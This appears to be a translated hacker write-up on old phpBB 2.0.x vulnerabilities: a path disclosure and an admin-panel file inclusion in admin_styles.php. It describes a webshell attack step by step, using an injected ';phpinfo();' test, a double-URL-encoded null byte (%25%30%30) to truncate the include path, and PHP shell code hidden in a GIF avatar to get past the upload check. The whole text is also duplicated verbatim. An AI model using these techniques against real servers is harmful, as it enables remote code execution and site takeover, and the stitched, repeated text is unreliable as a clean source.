1. Path Disclosure
Vulnerability file: /db/
Vulnerability description: Direct access, resulting in exposure of web paths
Version involved: phpbb <=2.013
Test: ie submit http://127.0.0.1/phpBB2/db/ returns an error:
Fatal error: Cannot redeclare sql_nextid() in f:\easyphp1-7\www\phpbb2\db\ on line 405
Solution
If you are not using the oracle database, you can delete it directly.
Modify settings: display_errors=Off
2. Remote php File Include
Vulnerability file: /admin/admin_styles.php
Vulnerability description: The variables in the admin_styles.php file are not filtered strictly, resulting in malicious code being executed from the background, thus jeopardizing server security
Version involved: phpbb <=2.013+ php <5.0
Vulnerability Analysis:
71 case "addnew":
72 $install_to = ( isset($HTTP_GET_VARS[install_to]) ) ? urldecode($HTTP_GET_VARS[install_to]) : $HTTP_POST_VARS[install_to];
73 $style_name = ( isset($HTTP_GET_VARS[style]) ) ? urldecode($HTTP_GET_VARS[style]) : $HTTP_POST_VARS[style];
74
75 if( isset($install_to) )
76 {
77
78 include($phpbb_root_path. "templates/" . $install_to . "/theme_info.cfg");
79
80 $template_name = $install_to;
81 $found = FALSE;
The $install_to variable is not filtered strictly, resulting in being called by include($phpbb_root_path. "templates/" . $install_to . "/theme_info.cfg");. The intruder can achieve attack by constructing $install_to
Purpose
Test analysis (purpose: get webshelll from the background):
First we only look at 78 lines of code
78 include($phpbb_root_path. "templates/" . $install_to . "/theme_info.cfg");
include finally execute the theme_info.cfg file. theme_info.cfg is some settings that save "style". If we can insert malicious code from the theme_info.cfg file, then we will directly execute our code through include :) [Refer to "A little idea from the background to the webshell"] Let's test it:
Background style management --> Management options --->Edit -->CSS style table input ";phpinfo();" (can also be inserted by other variables), and then the "Output" setting is successfully saved to the theme_info.cfg file
Let's open theme_info.cfg to see:
$subSilver[0][head_stylesheet] = "\";phpinfo();\"";
Depressed "was filtered. I tested it under magic_quotes_gpc = off. It seems that phpbb itself has filtered it. This path is not accessible:(
There is a vulnerability to null truncation in php itself for <5.0 (excluding 4.10):
--------------------------------------------------------------------------------------------------------------------------------
There is an input verification vulnerability in PHP, and remote attackers can use this vulnerability to read system file contents and perform directory traversal attacks.
The first problem is that there is a problem with addslashes(). addslashes() is used to filter user input. When magic_quotes_gpc is set "on", addslashes() will be performed on each input for filtering. However, because the NULL bytes are incorrectly encoded by addslashes(), if the user input is used by include() or require(), it may cause the attacker to read any file in the file system.
The second problem is the upload path traversal problem. PHP automatically filters the uploaded file name data and deletes the data before the slash or backslash. However, if the file uploaded by the attacker contains single quotes, and the WEB service sets magic_quotes to ON, or performs addslashes() operation on the uploaded file name, then a backslash will be prefixed before the single quotes. Therefore, on the Windows system, it can cause directory traversal problems, resulting in files uploading to any directory in the system.
Warning: main(./../templates/theme_info.cfg\0/theme_info.cfg): failed to open stream: No such file or directory in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 78
Warning: main(): Failed opening ./../templates/theme_info.cfg\0/theme_info.cfg for inclusion (include_path=.;f:\EasyPHP1-7\php\pear\) in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 7
%00 has changed from \0, phpbb is a pervert. Since %00 cannot work, we are seeing 72 lines of code:
72 $install_to = ( isset($HTTP_GET_VARS[install_to]) ) ? urldecode($HTTP_GET_VARS[install_to]) : $HTTP_POST_VARS[install_to];
The way we use ie commit is get. Then the &install_to we submit is to be parsed by urldecode(), then we can first url encoding %00: %25%30%30 Submit:
http://127.0.0.1/phpBB2/a......6eb9ea1e43e62cbd634
return:
Warning: main(./../templates/theme_info.cfg): failed to open stream: No such file or directory in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 78
Warning: main(): Failed opening ./../templates/theme_info.cfg for inclusion (include_path=.;f:\EasyPHP1-7\php\pear\) in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 7
Pay attention to comparison with %00
%00 ---> main(./../templates/theme_info.cfg\0/theme_info.cfg)
%25%30%30 ---> Warning: main(./../templates/theme_info.cfg)
Haha include was successfully truncated, so we can use.../ to call easy files :)
Specific utilization
We save the phpshell code to gif or other image format, upload it through the forum and then use the construct install_to to be called and executed.
Here, the phpshell code is saved as we upload the image to http://127.0.0.1/phpBB2/?mode=editprofile
Return error: The avatar filetype must be .jpg, .gif or .png
As shown in Figure 1
Everyone knows that image files have their "special logos". Using editing tools such as uedit, you can find that there is "GIF89a" at the beginning of the gif file. It seems that phpbb also uses getimagesize() or similar functions to judge after judging the suffix. So how can we get around it? Note that there is an empty data area of "0000..." at the end of the gif file, and we can write the php code into this.
As shown in Figure 2
Vulnerability file: /db/
Vulnerability description: Direct access, resulting in exposure of web paths
Version involved: phpbb <=2.013
Test: ie submit http://127.0.0.1/phpBB2/db/ returns an error:
Fatal error: Cannot redeclare sql_nextid() in f:\easyphp1-7\www\phpbb2\db\ on line 405
Solution
If you are not using the oracle database, you can delete it directly.
Modify settings: display_errors=Off
2. Remote php File Include
Vulnerability file: /admin/admin_styles.php
Vulnerability description: The variables in the admin_styles.php file are not filtered strictly, resulting in malicious code being executed from the background, thus jeopardizing server security
Version involved: phpbb <=2.013+ php <5.0
Vulnerability Analysis:
71 case "addnew":
72 $install_to = ( isset($HTTP_GET_VARS[install_to]) ) ? urldecode($HTTP_GET_VARS[install_to]) : $HTTP_POST_VARS[install_to];
73 $style_name = ( isset($HTTP_GET_VARS[style]) ) ? urldecode($HTTP_GET_VARS[style]) : $HTTP_POST_VARS[style];
74
75 if( isset($install_to) )
76 {
77
78 include($phpbb_root_path. "templates/" . $install_to . "/theme_info.cfg");
79
80 $template_name = $install_to;
81 $found = FALSE;
The $install_to variable is not filtered strictly, resulting in being called by include($phpbb_root_path. "templates/" . $install_to . "/theme_info.cfg");. The intruder can achieve attack by constructing $install_to
Purpose
Test analysis (purpose: get webshelll from the background):
First we only look at 78 lines of code
78 include($phpbb_root_path. "templates/" . $install_to . "/theme_info.cfg");
include finally execute the theme_info.cfg file. theme_info.cfg is some settings that save "style". If we can insert malicious code from the theme_info.cfg file, then we will directly execute our code through include :) [Refer to "A little idea from the background to the webshell"] Let's test it:
Background style management --> Management options --->Edit -->CSS style table input ";phpinfo();" (can also be inserted by other variables), and then the "Output" setting is successfully saved to the theme_info.cfg file
Let's open theme_info.cfg to see:
$subSilver[0][head_stylesheet] = "\";phpinfo();\"";
Depressed "was filtered. I tested it under magic_quotes_gpc = off. It seems that phpbb itself has filtered it. This path is not accessible:(
There is a vulnerability to null truncation in php itself for <5.0 (excluding 4.10):
--------------------------------------------------------------------------------------------------------------------------------
There is an input verification vulnerability in PHP, and remote attackers can use this vulnerability to read system file contents and perform directory traversal attacks.
The first problem is that there is a problem with addslashes(). addslashes() is used to filter user input. When magic_quotes_gpc is set "on", addslashes() will be performed on each input for filtering. However, because the NULL bytes are incorrectly encoded by addslashes(), if the user input is used by include() or require(), it may cause the attacker to read any file in the file system.
The second problem is the upload path traversal problem. PHP automatically filters the uploaded file name data and deletes the data before the slash or backslash. However, if the file uploaded by the attacker contains single quotes, and the WEB service sets magic_quotes to ON, or performs addslashes() operation on the uploaded file name, then a backslash will be prefixed before the single quotes. Therefore, on the Windows system, it can cause directory traversal problems, resulting in files uploading to any directory in the system.
Warning: main(./../templates/theme_info.cfg\0/theme_info.cfg): failed to open stream: No such file or directory in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 78
Warning: main(): Failed opening ./../templates/theme_info.cfg\0/theme_info.cfg for inclusion (include_path=.;f:\EasyPHP1-7\php\pear\) in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 7
%00 has changed from \0, phpbb is a pervert. Since %00 cannot work, we are seeing 72 lines of code:
72 $install_to = ( isset($HTTP_GET_VARS[install_to]) ) ? urldecode($HTTP_GET_VARS[install_to]) : $HTTP_POST_VARS[install_to];
The way we use ie commit is get. Then the &install_to we submit is to be parsed by urldecode(), then we can first url encoding %00: %25%30%30 Submit:
http://127.0.0.1/phpBB2/a......6eb9ea1e43e62cbd634
return:
Warning: main(./../templates/theme_info.cfg): failed to open stream: No such file or directory in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 78
Warning: main(): Failed opening ./../templates/theme_info.cfg for inclusion (include_path=.;f:\EasyPHP1-7\php\pear\) in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 7
Pay attention to comparison with %00
%00 ---> main(./../templates/theme_info.cfg\0/theme_info.cfg)
%25%30%30 ---> Warning: main(./../templates/theme_info.cfg)
Haha include was successfully truncated, so we can use.../ to call easy files :)
Specific utilization
We save the phpshell code to gif or other image format, upload it through the forum and then use the construct install_to to be called and executed.
Here, the phpshell code is saved as we upload the image to http://127.0.0.1/phpBB2/?mode=editprofile
Return error: The avatar filetype must be .jpg, .gif or .png
As shown in Figure 1
Everyone knows that image files have their "special logos". Using editing tools such as uedit, you can find that there is "GIF89a" at the beginning of the gif file. It seems that phpbb also uses getimagesize() or similar functions to judge after judging the suffix. So how can we get around it? Note that there is an empty data area of "0000..." at the end of the gif file, and we can write the php code into this.
As shown in Figure 2